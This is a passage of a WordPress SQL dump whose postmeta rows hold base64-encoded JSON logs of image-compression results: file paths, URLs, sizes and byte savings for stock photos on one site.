HgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI1NTgzODk0Mi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNTU4Mzg5NDItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ1MywidGltZSI6MTQ4MzU4NDY5MSwiaWQiOjY5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNTU4Mzg5NDItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjU1ODM4OTQyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI1NTgzODk0Mi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTcxLCJ0aW1lIjoxNDgzNTg0Njk0LCJpZCI6NjkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI1NTgzODk0Mi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNTU4Mzg5NDItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjU1ODM4OTQyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2NjUsInRpbWUiOjE0ODM1ODQ2OTgsImlkIjo2OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjU1ODM4OTQyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI1NTgzODk0Mi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNTU4Mzg5NDItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjgyNSwidGltZSI6MTQ4MzU4NDcwMiwiaWQiOjY5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNTU4Mzg5NDItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjU1ODM4OTQyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI1NTgzODk0Mi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTYxLCJ0aW1lIjoxNDgzNTg0NzA2LCJpZCI6NjkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30099, 689, 'wpfc_optimisation_reduction', '11286'); 
INSERT INTO `wp_postmeta` VALUES (30100, 689, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQuanBnIiwid2lkdGgiOjczNjAsImhlaWdodCI6NDkxMiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDcxMSwiaWQiOiI2ODkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6Njg1LCJ0aW1lIjoxNDgzNTg0NzE0LCJpZCI6Njg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTIyNiwidGltZSI6MTQ4MzU4NDcxOCwiaWQiOjY4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjExMjcsInRpbWUiOjE0ODM1ODQ3MjIsImlkIjo2ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0xNjAweDEwNjguanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTE2MDB4MTA2OC5qcGciLCJyZWR1Y3Rpb24iOjI4OTYsInRpbWUiOjE0ODM1ODQ3MjcsImlkIjo2ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NzIsInRpbWUiOjE0ODM1ODQ3MzAsImlkIjo2ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTcsInRpbWUiOjE0ODM1ODQ3MzQsImlkIjo2ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MjgsInRpbWUiOjE0ODM1ODQ3MzcsImlkIjo2ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4ODgsInRpbWUiOjE0ODM1ODQ3NDEsImlkIjo2ODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ4MCwidGltZSI6MTQ4MzU4NDc0NCwiaWQiOjY4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDg2LCJ0aW1lIjoxNDgzNTg0NzQ4LCJpZCI6Njg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo1OTcsInRpbWUiOjE0ODM1ODQ3NTEsImlkIjo2ODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYwOSwidGltZSI6MTQ4MzU4NDc1NSwiaWQiOjY4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxMTE1MjQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTExNTI0LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTExMTUyNC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6Njc1LCJ0aW1lIjoxNDgzNTg0NzU4LCJpZCI6Njg5fV0='); 
INSERT INTO `wp_postmeta` VALUES (30101, 688, 'wpfc_optimisation_reduction', '14194'); 
INSERT INTO `wp_postmeta` VALUES (30102, 688, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYuanBnIiwid2lkdGgiOjQ3MTYsImhlaWdodCI6MzgxOSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDc2MywiaWQiOiI2ODgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjI3LCJ0aW1lIjoxNDgzNTg0NzY3LCJpZCI6Njg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtODAweDY0OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjY0OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTgwMHg2NDguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni04MDB4NjQ4LmpwZyIsInJlZHVjdGlvbiI6MTM4MywidGltZSI6MTQ4MzU4NDc3MSwiaWQiOjY4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTc2OHg2MjIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo2MjIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni03Njh4NjIyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtNzY4eDYyMi5qcGciLCJyZWR1Y3Rpb24iOjEzMTYsInRpbWUiOjE0ODM1ODQ3NzUsImlkIjo2ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0xNjAweDEyOTYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTI5NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTE2MDB4MTI5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTE2MDB4MTI5Ni5qcGciLCJyZWR1Y3Rpb24iOjQ3NTMsInRpbWUiOjE0ODM1ODQ3ODAsImlkIjo2ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTYsInRpbWUiOjE0ODM1ODQ3ODMsImlkIjo2ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzEsInRpbWUiOjE0ODM1ODQ3ODYsImlkIjo2ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwv